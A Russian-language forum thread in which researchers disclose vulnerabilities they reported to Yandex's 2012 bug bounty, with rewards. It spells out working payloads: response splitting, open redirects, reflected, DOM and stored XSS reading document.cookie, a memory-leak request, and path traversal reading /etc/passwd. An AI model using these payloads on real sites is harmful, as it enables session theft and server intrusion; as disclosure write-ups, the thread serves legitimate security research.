YandexBugBounty

[BlackFan]

Конкурс «Охота за ошибками»

Цитата:

Яндекс выплачивает награды за обнаруженные проблемы в безопасности своих сервисов. Любой желающий может попытаться найти уязвимость, сообщить нам об этом и получить денежный приз.

Подробнее: http://company.yandex.ru/security/


Так как с начала конкурса прошло уже почти 3 месяца и по правилам программы скоро можно будет разглашать информацию о найденных уязвимостях, решил создать тут тему (обсуждение деталей багов не вписывается в Оффтоп -> Мировые новости).

Предлагаю тут выкладывать интересные (и не очень) уязвимости, а обсуждения из разряда "мало денег", "вайтхеты дураки" продолжать в старой теме.

[BlackFan]

И так, для начала клиентская HTTP Parameters Pollution, которую не приняли (вроде бы единственная моя бага, которую отвергли) с причиной:

Цитата:

Проблема, о которой вы сообщили нам, не представляет опасности для пользователя.

При обращении к папке "Адресаты" мобильной версии mail.yandex.ru параметр "current_folder" попадает в ссылку пройдя не urlencode, а замену html-сущностей.

Тем самым возможно реализовать HPP/HPC атаку, добавив дополнительные параметры к ссылке.

Так как скрипт отправки письма объединяет все параметры "to" через запятую, возможно добавление еще одного получателя письма незаметно для пользователя. Так же возможно переопределить начальное значение переменной "subj".


Пример:

Код:

http://mail.yandex.ru/m/abook?current_folder=x%26%20%20%20%20%20%26to=fake@mail.com

Короткая версия
http://bit.ly/UZnvrb

К ссылкам выбора пользователя добавляется параметры to



Выбираем пользователя:

[BlackFan]

Настало время ох*ительных историй (прошло более 90 дней с начала конкурса)

Итак, конкурс начался 21 сентября, в пятницу, и, отложив все дела на понедельник, я вновь офигев от количества сервисов и объемов работы, начал беспорядочно пихать кавычки во все поля ввода. Просидев так примерно 1,5 часа и ничего не найдя, вдруг вспомнил про старые тикеты, посланные уже после окончания предыдущего конкурса "Месяц поиска уязвимостей Яндекса". В тикете от 9 января 2012 года было две HTTP Response Splitting на pass.yandex.ru и pass.moikrug.ru, из них неожиданно сработала вторая.

HTTP Response Splitting
Приз: 10к рублей

Код:

http://pass.moikrug.ru/?retpath=http://yandex.ru%0d%0aSet-Cookie:test=test

Решив, что это довольно интересная тема, решил ее пофаззить еще на тему Open Redirect.

Обход ограничений перенаправления
Приз: 5к рублей

До перенаправления происходит некоторая проверка ссылки и нормальный заголовок "Location" добавляется только если это домен, принадлежащий яндексу. Скрипт проверял ссылку расчитывая на то, что в домене будут только символы A-Z, a-z, 0-9, -, но браузеры вполне нормально обрабатывают и символ _.

Код:

http://passport.yandex.ru/passport?mode=logout&retpath=http://yandex.ru_.blackfan.ru/
http://pass.yandex.ru/logout?retpath=http://yandex.ru_.blackfan.ru/
http://pass.moikrug.ru/?retpath=http://yandex.ru_.blackfan.ru/

Ну и напоследок

Чтение участков памяти
Приз: 30к рублей

Если в ссылке сразу за доменом шел нулл-байт, то происходила мутная муть и в ответе вываливался кусок памяти, который включал в себя как какие-то бинарные данные, так и вполне осмысленные логи и запросы пользователей включая все cookie. Было бы интересно почитать комментарии от разработчиков, почему так происходило

Код:

GET /?retpath=http://yandex.ru%00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
Host: pass.moikrug.ru

Итого: 45к за первый день участия и все через один сервис и один параметр
В сумме за все участие на данный момент 99к и еще 2 баги в запасе.

[Beched]

Ладно, у меня есть похожие баги, высланные 21 сентября =)
HTTP Response Splitting
Приз: 3к рублей

//Fuck, сейчас проверил -- оказалось, что так и не пофиксили, поэтому ещё подожду с описанием =)
Скажу только, что на первый взгляд баги не было, ибо в урле был токен, но токен, как оказалось, не проверялся.
+не резался одиночный разделитель \r, что привело к сплиттингу, поскольку браузеры не слушают RFC.

Обход ограничений перенаправления
Приз: 5к рублей

Редирект при помощи narod.ru. Этот домен входит в разрешённые для
редиректа, а там можно размещать что угодно =>

Код:

http://pass.yandex.ru/logout?retpath=http%3A%2F%2FMY_DOMAIN.narod.ru/

[shr]

XSS, 5к
Видя в твиттере, как народ ломанулся искать уязвимости, я решил посмотреть туда, куда вряд ли кто-то заглядывал, чтобы из-за задержки в пару дней не столкнуться с тем, что уязвимость кем-то уже зарепорчена. Хотелось сразу найти баг и посмотреть, как быстро выплачивают и стоит ли искать. Опыта в багхантинге за деньги не было. Через час было найдено 2 бага, 1 из которых XSS.

Цитата:

Сообщение от письмо от 24.09.2012

XSS
http://mobile.yandex.ru/samsung/virtualphone/#!/wave_3//ololo<img
src=x onerror=alert(document.cookie)>

Работает на
chrome 21.0.1180.89 m
opera 12.02

firefox 15.02 почему-то игнорирует # и отправляет запрос без нее, в итоге 404

Модифицированый url в каких-то случаях может зацикливать браузер
(chrome, firefox), но это воспроизводится нестабильно и вам вряд ли
будет интересно.

Забавно то, что через какое-то время вышел update chrome и xss перестала работать. Повезло

Пофиксили так, 305-306 строки script.js:

Код:

var path = encodeURIComponent(event.path);
fixLinks(path);

Судя по комментариям, промо-страничку делали в одной известной студии и бага тоже их. Код там адский ад, поэтому я не стал особо вникать.

Старая версия PHP, 3к

Тоже самое письмо от 24.09.2012

Цитата:

1. Предположительно A06. Ошибки конфигурации веб-окружения

Вообще маловероятно, что такая старая версия PHP работает, но вдруг.
Со страницы http://mobile.yandex.ru/tune.xml?app=yandexinstance отправляется запрос

Код:

GET /sendgprssms.php?retpath=http%3A%2F%2Fmobile.yandex.ru%2Fstatus%2F&operator=1&suggest=HTC+Desire+S&countrycode=7&code=916&phone=1231231&brand=131&models-131=20&smsid=20 HTTP/1.1
 User-Agent: Opera/9.80 (Windows NT 6.1; WOW64; U; ru) Presto/2.10.289 Version/12.02
 Host: md.ya.ru
 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
 Accept-Encoding: gzip, deflate
 Referer: http://mobile.yandex.ru/tune.xml?app=yandexinstance
 Cookie: PHPSESSID=7c998e1da895a47ca8dfc504bf7d422b
 Connection: Keep-Alive

Ответ

Код:

HTTP/1.1 302 Moved Temporarily
 X-Powered-By: PHP/5.2.4-2ubuntu5.17
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Pragma: no-cache
 Cache-Control: no-cache
 Content-Type: text/html; charset=windows-1251
 Location: http://mobile.yandex.ru/status/?status=gprsok&app=
 Content-Length: 0
 Date: Mon, 24 Sep 2012 07:30:38 GMT
 Server: lighttpd/1.4.26
 X-Cache: MISS from webproxy
 Via: 1.1 webproxy (squid/3.2.1)
 Connection: keep-alive

В ответе видно
X-Powered-By: PHP/5.2.4-2ubuntu5.17

Работает и пасхалка
http://md.ya.ru/sendgprssms.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42

Судя по
http://habrahabr.ru/post/88966/
http://www.0php.com/php_easter_egg.php
COLORED PHP LOGO:
PHP Version 5.1.3 - 5.2.13

Версии php до 5.3.9 уязвимы к hash collision (DoS)
http://www.cvedetails.com/cve/CVE-2011-4885/

Эксплоитами проверять не стал.

Кстати, этот сервис вообще работает? Мне ни одна смс не пришла, хотя пишет, что отправлена.

Также можно манипулировать адресом в параметре retpath. Редирект на mobile.yandex.ru.example.com проходит.

Редирект проигнорили, сами страницы, похоже, удалили.

[BlackFan]

XSS
Приз: 10к рублей

XSS на www.yandex.ru в строке поиска.
Данные из GET переменной "text" попадают в javascript переменную "title", после чего вызывается следующий код:

Код:

var title = "[user_input] — Яндекс: ничего не найдено"
el = document.createElement("i");
el.innerHTML = title;
document.title = el.firstChild.nodeValue;

В переменной text символы <>'" проходят функцию типа htmlspecialchars, но символ \ попадает в javascript в чистом виде.
Таким образом можно сформировать html теги в переменной title используя кодирование символов \xAA или \u00AA, которые в дальнейшем попадут в el.innerHTML и отработают.

Эксплуатация:

Код:

http://yandex.ru/yandsearch?text=\x3cimg+src=x+\x6f\x6eerror=alert(1)\x3e&lr=51

onerror закодирован для обхода фильтров IE.

Ну и конечно без пафосной картинки тут никак не обойтись.

[kyprizel]

Цитата:

Сообщение от BlackFan

Чтение участков памяти
Приз: 30к рублей

Если в ссылке сразу за доменом шел нулл-байт, то происходила мутная муть и в ответе вываливался кусок памяти, который включал в себя как какие-то бинарные данные, так и вполне осмысленные логи и запросы пользователей включая все cookie. Было бы интересно почитать комментарии от разработчиков, почему так происходило

Код:

GET /?retpath=http://yandex.ru%00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
Host: pass.moikrug.ru

Итого: 45к за первый день участия и все через один сервис и один параметр
В сумме за все участие на данный момент 99к и еще 2 баги в запасе.

на самом деле проблема с памятью была в Nginx: CVE-2012-1180
патч:
http://nginx.org/download/patch.2012.memory.txt
триггерилась нуль-байтом в выдаче, т.е. природа та же, что и у response splitting'а, но с таким вот интересным эффектом.

[BlackFan]

DOM Based XSS
Приз: 10к рублей

Довольно забавная DOM Based XSS, ее раскручивать было интереснее всего.
На очень многих сайтах яндекса после ввода информации в строку поиска и нажатии кнопки "найти", происходит запрос на сценарий "http://clck.yandex.ru/jclck/".
Данный запрос возвращает комментарий, который выполняется в контексте безопасности уязвимого сайта.

Код:

/* counted */

Пример запроса для maps.yandex.ru, при вводе строки test:

Код:

http://clck.yandex.ru/jclck/dtype=stred/pid=0/cid=2873
/path=maps.not_used.p0.nah_not_shown./session=1352991374973
/region=/times=NaN.105/pos=4/text=test/user_input=test
/ratio=4.4.2/since_first_change=753/since_last_change=725
/*data=url%3Dhttp%253A%252F%252Fmaps.yandex.ru%252F%253F

Суть в том, что пользовательские данные в этом запросе находятся в пути к сценарию и не проходят никаких обработок. Используя символы "../" в пользовательском вводе, мы можем обратиться к произвольному сценарию с произвольными параметрами в пределах сайта "clck.yandex.ru".

Также, на данном сайте нашелся сценарий "http://clck.yandex.ru/redir/", который возвращает 302 код и может перенаправить наш запрос на произвольный сайт "*.yandex.ru". Таким образом, для выполнения JS кода нам остается только сформировать этот код на одном из сайтов яндекса. Для примера я взял сценарий "http://api-maps.yandex.ru/2.0.10/release/combine.xml?", в котором через переменную jsonp_prefix формируется payload и остальная ненужная часть контента комментируется.

Код:

http://api-maps.yandex.ru/2.0.10/release/combine.xml?modules=test&jsonp_prefix=alert('xss')//&

Ответ:
alert('xss')//_test([]);

Финальная логика эксплуатации:
1) Вводим специально сформированную строку в поле ввода
2) При нажатии кнопки "Найти" происходит запрос к http://clck.yandex.ru/jclck/
3) За счет символов "../" изменяем путь к скрипту и вызываем http://clck.yandex.ru/redir/
4) Перенаправляем запрос на http://api-maps.yandex.ru/2.0.10/release/combine.xml, который возвращает наш payload

Пример сформированной строки для эксплуатации:

Код:

../../../../../../../../../../..
/redir/*http://api-maps.yandex.ru/2.0.10/release
/combine.xml?modules=test&jsonp_prefix=alert('xss')//&#

Вместо 
http://clck.yandex.ru/jclck/
Произойдет вызов
http://clck.yandex.ru/redir/*http://api-maps.yandex.ru/2.0.10/release/combine.xml?modules=test&jsonp_prefix=alert('xss')//

Результат:


Также, многие сайты поддерживают возможность установить значение поля ввода через GET параметры.
Таким образом, можно сместить наш payload пробелами и любое нажатие на кнопку "Найти" приведет к выполнению кода.
Пример:

Код:

http://maps.yandex.ru/?text=%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fredir%2F*http%3A%2F%2Fapi-maps.yandex.ru%2F2.0.10%2Frelease%2Fcombine.xml%3Fmodules%3Dtest%26jsonp_prefix%3Dalert('xss')%2F%2F&sll=50.18736599999995%2C53.21570399999772&sspn=0.322723%2C0.164658&z=12&results=20&ll=50.187366%2C53.215704&spn=0.322723%2C0.164658&l=map

Уязвимые сайты:
maps.yandex.ru, pogoda.yandex.ru, people.yandex.ru, blogs.yandex.ru, news.yandex.ru, market.yandex.ru, rabota.yandex.ru

[BlackFan]

YandexBugBounty

XSS [maps.yandex.ru] /resources/cameras/probki-player.swf (10k рублей)

Параметры callback и player_id попадали в "flash.external.ExternalInterface.call" после прохождения функции validateParam использующей черный список

Код:

internal function validateParam(arg1:String):String
{
  var loc1:*=decodeURIComponent(arg1);
  var loc2:*=loc1.match(new RegExp("<|>|;|\\(|\\)|\\{|\\}|\\#|\\%|\\@|\\/|\\:|\\|", "g"));
  if (loc2 && loc2.length > 0)
  {
    return "";
  }
  return arg1;
}

Так как функция не проверяет символ \ возможно сформировать следующий запрос:

Код:

http://maps.yandex.ru/resources/cameras/probki-player.swf?callback=eval&player_id=\141\154\145\162\164\050\144\157\143\165\155\145\156\164\056\143\157\157\153\151\145\051

Результат выполнения ExternalInterface.call:

try { __flash__toXML(eval("\141\154\145\162\164\050\144\157\143\165\155\145\156\164\056\143\157\157\153\151\145\051")); } catch (e) { "<undefined/>"; }

DOM-Based XSS [rabota.yandex.ru] (5k рублей)

При поиске вакансий можно "Подписаться на уведомления о новых объявлениях".
В форме подписки фраза "Вакансии по запросу «[user_search]»" отображалась некорректно, в поисковой строке заменялись только первые включения символов < > &.

Код:

(function() {
    function a(b) {
        return b.replace("&", "&amp;").replace(">", "&gt;").replace("<", "&lt;")
    }
    BEM.HTML.decl("b-subscribe-settings-text", {
        onBlock: function(b) {
            b.content([{
                    elem: "title",
                    content: a(b.param("title"))
                },
                a(b.param("body"))
            ])
        }
    })
})();

Правильный вариант:

Код:

return b.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;")

Эксплуатация:

Код:

http://rabota.yandex.ru/search.xml/?text=%3C%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E

XSS [yandex.ru] (20k рублей)

Переменная site попадала в JavaScript без экранирования обратного слеша.

Код:

http://yandex.ru/yandsearch?text=xxx&site=,alert(document.cookie)])//\&lr=51

Результат:

Код:

Lego.oframebust([/^(\w*\.)*yandex.(ru|kz|by|ua|com)\.?$/, "*.,alert(document.cookie)])//\", ",alert(document.cookie)])//\", "*.yandex-team.ru", "compare.yandex.net", /^(\w*\.)*yandex\.com\.tr\.?$/])

Хранимая XSS [wdgt.yandex.ru] (10k рублей)

После создания своего iframe-виджета title попадал в JavaScript без экранирования обратного слеша.

Код:

widget = Widget.Bind("143283-1", {bla:"bla",title: "\\"});alert(document.domain);//",intid: "143283-1",intclassid: "143283"});window.ya && ya.widgets && ya.widgets.instances && ya.widgets.instances.add( widget );

Результат - хранимая XSS на странице редактирования виджета:

Код:

http://wdgt.yandex.ru/widgets/<widget_id>/

А также, не смотря на сообщение о модерации, хранимую XSS можно использовать в атаках на пользователей используя "Ссылку для установки на Яндекс".

Код:

Например: http://www.yandex.ru/?add=<widget_id>&from=promocode

При открытии ссылки установки на Яндекс JavaScript выполнялся в контексте yandex.ru без необходимости нажатия кнопки "Вы действительно хотите добавить этот виджет?"




Яндекс.Директ XSS (31,337k рублей)

Логика работы Яндекс.Директ:

1) Загрузка скрипта-лоадера http://an.yandex.ru/system/context.js

2) Загрузка нужной версии основного скрипта http://an.yandex.ru/resource/context_static_r633.js

3) Отправка запроса
http://an.yandex.ru/page/<page_id>?target-ref=<referer>&charset=utf-8&grab=..&callback=Ya[1379305496812]

Где target-ref - текущий location.href страницы, на которой установлена реклама от Яндекса

4) Ответ

Код:

Ya[1379305496812]('{ common: ..., direct: {  ads: ...,  linkHow: ...,  
linkAll: {title: "Все объявления", 
url: "http://direct.yandex.ru/search?from=http://example.com/?x=\x22\x2balert(1)\x2b\x22&ref-page=108290"  },  directTitle: ... }}')

В возвращаемом ответе <target-ref> использовался без экранирования обратного слэша.

5) Таким образом, при таком запросе
http://example.com/?x=\x22\x2balert(1)\x2b\x22
страницы, на которой расположена реклама от Яндекса, по сути выполнялся следующий JavaScript в контексте этой страницы:

Код:

s = Function(
  'return 
    {common:
      {linkAll:
        {
        title:"Все объявления",
        url:"http://direct.yandex.ru/search?from=http://example.com/%3Fx="+alert(1)+"&ref-page=108290"
        }
      }
    };
')();

То есть были подвержены любые сайты, на которых была расположена реклама от Яндекса.





Ну и как бонус, не хочу создавать новую тему:

FoxyCart RCE
http://www.foxycart.com/security-contact

Без комментариев

[BlackFan]

LFI [m.market.yandex.ru] (31337 рублей)

Обнаружено было случайно (плагином к Burp для поиска XSS через Request-URI) из-за ошибки при следующем запросе.

http://m.market.yandex.ru// (ошибка есть до сих пор)

Код:

<xscript_invoke_failed error="Evaluate script :
JS ERROR 206: Error: Caught exception 'basic_filebuf::underflow error reading the file' in xscript::js_file::load, line: 6" block="js"/>
            <xscript_invoke_failed error="empty path" block="file" method="invoke"/>

Подключался файл примерно таким образом:

Код:

docroot://${REQUEST_URI}

Благодаря lighttpd следующие запросы не блокировались при разборе и корректно обрабатывались:

Код:

GET /../../../../../xxx HTTP/1.1

Таким образом, с помощью найденной уязвимости можно было:

1) В случае возможности сформировать на сервере валидную XML, содержимое которой мы контроллируем, это бы дало как минимум: все возможности XScript (с ним, к сожалению, не работал и подробно не могу расписать, но это как минимум server-side js, lua, чтение произвольных файлов, произвольные http запросы), XXE

2) Подключение xscript xml, относящихся к другим сайтам на этом сервера.
Что из-за разности docroot (при относительном подключении файлов) давало кучу ошибок, информацию о содержимом этих скриптов и пищу для размышлений

3) Подключение xscript xml, относящихся к этом сайту с получением "сырого" ответа без обработки xslt

4) Чтение первой строчки не xml файлов (через ошибку разбора xml)

Код:

GET /../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash

GET /../../../../../etc/hostname
pepelac09e

5) Брутфорс директорий по разности ответов

Код:

GET /../../../../../var/www
GET /../../../../../var/xxx